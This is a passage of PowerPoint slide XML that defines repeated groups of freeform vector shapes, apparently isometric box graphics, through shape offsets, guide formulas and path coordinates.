            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3248" y="2374"/>
                <a:ext cx="182" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 565"/>
                  <a:gd name="T1" fmla="*/ 121 h 152"/>
                  <a:gd name="T2" fmla="*/ 447 w 565"/>
                  <a:gd name="T3" fmla="*/ 0 h 152"/>
                  <a:gd name="T4" fmla="*/ 565 w 565"/>
                  <a:gd name="T5" fmla="*/ 31 h 152"/>
                  <a:gd name="T6" fmla="*/ 116 w 565"/>
                  <a:gd name="T7" fmla="*/ 152 h 152"/>
                  <a:gd name="T8" fmla="*/ 0 w 565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2"/>
                  <a:gd name="T17" fmla="*/ 565 w 565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2">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="447" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116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5" name="Freeform 392"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3823" y="2219"/>
                <a:ext cx="182" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 565"/>
                  <a:gd name="T1" fmla="*/ 121 h 152"/>
                  <a:gd name="T2" fmla="*/ 449 w 565"/>
                  <a:gd name="T3" fmla="*/ 0 h 152"/>
                  <a:gd name="T4" fmla="*/ 565 w 565"/>
                  <a:gd name="T5" fmla="*/ 31 h 152"/>
                  <a:gd name="T6" fmla="*/ 119 w 565"/>
                  <a:gd name="T7" fmla="*/ 152 h 152"/>
                  <a:gd name="T8" fmla="*/ 0 w 565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2"/>
                  <a:gd name="T17" fmla="*/ 565 w 565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2">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="449" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119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6" name="Freeform 393"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3536" y="2297"/>
                <a:ext cx="181" cy="48"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 565"/>
                  <a:gd name="T1" fmla="*/ 121 h 152"/>
                  <a:gd name="T2" fmla="*/ 447 w 565"/>
                  <a:gd name="T3" fmla="*/ 0 h 152"/>
                  <a:gd name="T4" fmla="*/ 565 w 565"/>
                  <a:gd name="T5" fmla="*/ 31 h 152"/>
                  <a:gd name="T6" fmla="*/ 116 w 565"/>
                  <a:gd name="T7" fmla="*/ 152 h 152"/>
                  <a:gd name="T8" fmla="*/ 0 w 565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2"/>
                  <a:gd name="T17" fmla="*/ 565 w 565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2">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="447" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116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7" name="Freeform 394"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3483" y="2282"/>
                <a:ext cx="719" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 603 h 679"/>
                  <a:gd name="T2" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T3" fmla="*/ 0 h 679"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 76 h 679"/>
                  <a:gd name="T6" fmla="*/ 0 w 2239"/>
                  <a:gd name="T7" fmla="*/ 679 h 679"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 603 h 6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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 679"/>
                  <a:gd name="T17" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T18" fmla="*/ 679 h 67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9" h="679">
                    <a:moveTo>
                      <a:pt x="0" y="603"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="603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8" name="Freeform 395"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3051" y="2359"/>
                <a:ext cx="432" cy="141"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 438"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 362 h 438"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 438 h 438"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 76 h 438"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0 h 4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4"/>
                  <a:gd name="T16" fmla="*/ 0 h 438"/>
                  <a:gd name="T17" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T18" fmla="*/ 438 h 4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4" h="438">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="438"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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389" name="Group 389"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3925422" y="2776809"/>
              <a:ext cx="1533724" cy="444325"/>
              <a:chOff x="3051" y="2167"/>
              <a:chExt cx="1151" cy="333"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="390" name="Freeform 390"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3051" y="2167"/>
                <a:ext cx="1151" cy="309"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3583"/>
                  <a:gd name="T1" fmla="*/ 600 h 962"/>
                  <a:gd name="T2" fmla="*/ 2239 w 3583"/>
                  <a:gd name="T3" fmla="*/ 0 h 962"/>
                  <a:gd name="T4" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T5" fmla="*/ 359 h 962"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3583"/>
                  <a:gd name="T7" fmla="*/ 962 h 962"/>
                  <a:gd name="T8" fmla="*/ 0 w 3583"/>
                  <a:gd name="T9" fmla="*/ 600 h 9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83"/>
                  <a:gd name="T16" fmla="*/ 0 h 962"/>
                  <a:gd name="T17" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T18" fmla="*/ 962 h 9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83" h="962">
                    <a:moveTo>
                      <a:pt x="0" y="600"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3583" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="600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91" name="Freeform 391"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3248" y="2374"/>
                <a:ext cx="182" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 565"/>
                  <a:gd name="T1" fmla="*/ 121 h 152"/>
                  <a:gd name="T2" fmla="*/ 447 w 565"/>
                  <a:gd name="T3" fmla="*/ 0 h 152"/>
                  <a:gd name="T4" fmla="*/ 565 w 565"/>
                  <a:gd name="T5" fmla="*/ 31 h 152"/>
                  <a:gd name="T6" fmla="*/ 116 w 565"/>
                  <a:gd name="T7" fmla="*/ 152 h 152"/>
                  <a:gd name="T8" fmla="*/ 0 w 565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2"/>
                  <a:gd name="T17" fmla="*/ 565 w 565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2">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="447" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116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92" name="Freeform 392"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3823" y="2219"/>
                <a:ext cx="182" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 565"/>
                  <a:gd name="T1" fmla="*/ 121 h 152"/>
                  <a:gd name="T2" fmla="*/ 449 w 565"/>
                  <a:gd name="T3" fmla="*/ 0 h 152"/>
                  <a:gd name="T4" fmla="*/ 565 w 565"/>
                  <a:gd name="T5" fmla="*/ 31 h 152"/>
                  <a:gd name="T6" fmla="*/ 119 w 565"/>
                  <a:gd name="T7" fmla="*/ 152 h 152"/>
                  <a:gd name="T8" fmla="*/ 0 w 565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2"/>
                  <a:gd name="T17" fmla="*/ 565 w 565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2">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="449" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119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93" name="Freeform 393"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3536" y="2297"/>
                <a:ext cx="181" cy="48"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 565"/>
                  <a:gd name="T1" fmla="*/ 121 h 152"/>
                  <a:gd name="T2" fmla="*/ 447 w 565"/>
                  <a:gd name="T3" fmla="*/ 0 h 152"/>
                  <a:gd name="T4" fmla="*/ 565 w 565"/>
                  <a:gd name="T5" fmla="*/ 31 h 152"/>
                  <a:gd name="T6" fmla="*/ 116 w 565"/>
                  <a:gd name="T7" fmla="*/ 152 h 152"/>
                  <a:gd name="T8" fmla="*/ 0 w 565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2"/>
                  <a:gd name="T17" fmla="*/ 565 w 565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2">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="447" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116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94" name="Freeform 394"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3483" y="2282"/>
                <a:ext cx="719" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 603 h 679"/>
                  <a:gd name="T2" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T3" fmla="*/ 0 h 679"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 76 h 679"/>
                  <a:gd name="T6" fmla="*/ 0 w 2239"/>
                  <a:gd name="T7" fmla="*/ 679 h 679"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 603 h 6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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 679"/>
                  <a:gd name="T17" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T18" fmla="*/ 679 h 67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9" h="679">
                    <a:moveTo>
                      <a:pt x="0" y="603"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="603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95" name="Freeform 395"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3051" y="2359"/>
                <a:ext cx="432" cy="141"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 438"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 362 h 438"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 438 h 438"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 76 h 438"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0 h 4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4"/>
                  <a:gd name="T16" fmla="*/ 0 h 438"/>
                  <a:gd name="T17" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T18" fmla="*/ 438 h 4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4" h="438">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="438"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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396" name="Group 389"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2982529" y="3032141"/>
              <a:ext cx="1533724" cy="444325"/>
              <a:chOff x="3051" y="2167"/>
              <a:chExt cx="1151" cy="333"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="397" name="Freeform 390"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3051" y="2167"/>
                <a:ext cx="1151" cy="309"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3583"/>
                  <a:gd name="T1" fmla="*/ 600 h 962"/>
                  <a:gd name="T2" fmla="*/ 2239 w 3583"/>
                  <a:gd name="T3" fmla="*/ 0 h 962"/>
                  <a:gd name="T4" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T5" fmla="*/ 359 h 962"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3583"/>
                  <a:gd name="T7" fmla="*/ 962 h 962"/>
                  <a:gd name="T8" fmla="*/ 0 w 3583"/>
                  <a:gd name="T9" fmla="*/ 600 h 9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83"/>
                  <a:gd name="T16" fmla="*/ 0 h 962"/>
                  <a:gd name="T17" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T18" fmla="*/ 962 h 9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83" h="962">
                    <a:moveTo>
                      <a:pt x="0" y="600"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3583" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="600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98" name="Freeform 391"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3248" y="2374"/>
                <a:ext cx="182" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 565"/>
                  <a:gd name="T1" fmla="*/ 121 h 152"/>
                  <a:gd name="T2" fmla="*/ 447 w 565"/>
                  <a:gd name="T3" fmla="*/ 0 h 152"/>
                  <a:gd name="T4" fmla="*/ 565 w 565"/>
                  <a:gd name="T5" fmla="*/ 31 h 152"/>
                  <a:gd name="T6" fmla="*/ 116 w 565"/>
                  <a:gd name="T7" fmla="*/ 152 h 152"/>
                  <a:gd name="T8" fmla="*/ 0 w 565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2"/>
                  <a:gd name="T17" fmla="*/ 565 w 565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2">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="447" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116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99" name="Freeform 392"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3823" y="2219"/>
                <a:ext cx="182" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 565"/>
                  <a:gd name="T1" fmla="*/ 121 h 152"/>
                  <a:gd name="T2" fmla="*/ 449 w 565"/>
                  <a:gd name="T3" fmla="*/ 0 h 152"/>
                  <a:gd name="T4" fmla="*/ 565 w 565"/>
                  <a:gd name="T5" fmla="*/ 31 h 152"/>
                  <a:gd name="T6" fmla="*/ 119 w 565"/>
                  <a:gd name="T7" fmla="*/ 152 h 152"/>
                  <a:gd name="T8" fmla="*/ 0 w 565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2"/>
                  <a:gd name="T17" fmla="*/ 565 w 565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2">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="449" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119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00" name="Freeform 393"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3536" y="2297"/>
                <a:ext cx="181" cy="48"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 565"/>
                  <a:gd name="T1" fmla="*/ 121 h 152"/>
                  <a:gd name="T2" fmla="*/ 447 w 565"/>
                  <a:gd name="T3" fmla="*/ 0 h 152"/>
                  <a:gd name="T4" fmla="*/ 565 w 565"/>
                  <a:gd name="T5" fmla="*/ 31 h 152"/>
                  <a:gd name="T6" fmla="*/ 116 w 565"/>
                  <a:gd name="T7" fmla="*/ 152 h 152"/>
                  <a:gd name="T8" fmla="*/ 0 w 565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2"/>
                  <a:gd name="T17" fmla="*/ 565 w 565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2">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="447" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116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01" name="Freeform 394"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3483" y="2282"/>
                <a:ext cx="719" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 603 h 679"/>
                  <a:gd name="T2" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T3" fmla="*/ 0 h 679"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 76 h 679"/>
                  <a:gd name="T6" fmla="*/ 0 w 2239"/>
                  <a:gd name="T7" fmla="*/ 679 h 679"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 603 h 6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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 679"/>
                  <a:gd name="T17" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T18" fmla="*/ 679 h 67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9" h="679">
                    <a:moveTo>
                      <a:pt x="0" y="603"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="603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02" name="Freeform 395"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3051" y="2359"/>
                <a:ext cx="432" cy="141"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 438"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 362 h 438"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 438 h 438"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 76 h 438"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0 h 4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4"/>
                  <a:gd name="T16" fmla="*/ 0 h 438"/>
                  <a:gd name="T17" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T18" fmla="*/ 438 h 4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4" h="438">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="438"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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403" name="Group 389"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2031824" y="3287547"/>
              <a:ext cx="1533724" cy="444325"/>
              <a:chOff x="3051" y="2167"/>
              <a:chExt cx="1151" cy="333"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="404" name="Freeform 390"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3051" y="2167"/>
                <a:ext cx="1151" cy="309"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3583"/>
                  <a:gd name="T1" fmla="*/ 600 h 962"/>
                  <a:gd name="T2" fmla="*/ 2239 w 3583"/>
                  <a:gd name="T3" fmla="*/ 0 h 962"/>
                  <a:gd name="T4" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T5" fmla="*/ 359 h 962"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3583"/>
                  <a:gd name="T7" fmla="*/ 962 h 962"/>
                  <a:gd name="T8" fmla="*/ 0 w 3583"/>
                  <a:gd name="T9" fmla="*/ 600 h 9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83"/>
                  <a:gd name="T16" fmla="*/ 0 h 962"/>
                  <a:gd name="T17" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T18" fmla="*/ 962 h 9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83" h="962">
                    <a:moveTo>
                      <a:pt x="0" y="600"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3583" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="600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05" name="Freeform 391"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3248" y="2374"/>
                <a:ext cx="182" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 565"/>
                  <a:gd name="T1" fmla="*/ 121 h 152"/>
                  <a:gd name="T2" fmla="*/ 447 w 565"/>
                  <a:gd name="T3" fmla="*/ 0 h 152"/>
                  <a:gd name="T4" fmla="*/ 565 w 565"/>
                  <a:gd name="T5" fmla="*/ 31 h 152"/>
                  <a:gd name="T6" fmla="*/ 116 w 565"/>
                  <a:gd name="T7" fmla="*/ 152 h 152"/>
                  <a:gd name="T8" fmla="*/ 0 w 565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2"/>
                  <a:gd name="T17" fmla="*/ 565 w 565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2">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="447" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116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06" name="Freeform 392"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3823" y="2219"/>
                <a:ext cx="182" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 565"/>
                  <a:gd name="T1" fmla="*/ 121 h 152"/>
                  <a:gd name="T2" fmla="*/ 449 w 565"/>
                  <a:gd name="T3" fmla="*/ 0 h 152"/>
                  <a:gd name="T4" fmla="*/ 565 w 565"/>
                  <a:gd name="T5" fmla="*/ 31 h 152"/>
                  <a:gd name="T6" fmla="*/ 119 w 565"/>
                  <a:gd name="T7" fmla="*/ 152 h 152"/>
                  <a:gd name="T8" fmla="*/ 0 w 565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2"/>
                  <a:gd name="T17" fmla="*/ 565 w 565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2">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="449" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119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07" name="Freeform 393"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3536" y="2297"/>
                <a:ext cx="181" cy="48"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 565"/>
                  <a:gd name="T1" fmla="*/ 121 h 152"/>
                  <a:gd name="T2" fmla="*/ 447 w 565"/>
                  <a:gd name="T3" fmla="*/ 0 h 152"/>
                  <a:gd name="T4" fmla="*/ 565 w 565"/>
                  <a:gd name="T5" fmla="*/ 31 h 152"/>
                  <a:gd name="T6" fmla="*/ 116 w 565"/>
                  <a:gd name="T7" fmla="*/ 152 h 152"/>
                  <a:gd name="T8" fmla="*/ 0 w 565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2"/>
                  <a:gd name="T17" fmla="*/ 565 w 565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2">
                    <a:moveTo>
                      <a:pt x="0" y="121"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="447" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116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08" name="Freeform 394"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3483" y="2282"/>
                <a:ext cx="719" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 603 h 679"/>
                  <a:gd name="T2" fmla="*/ 2239 w 2239"/>
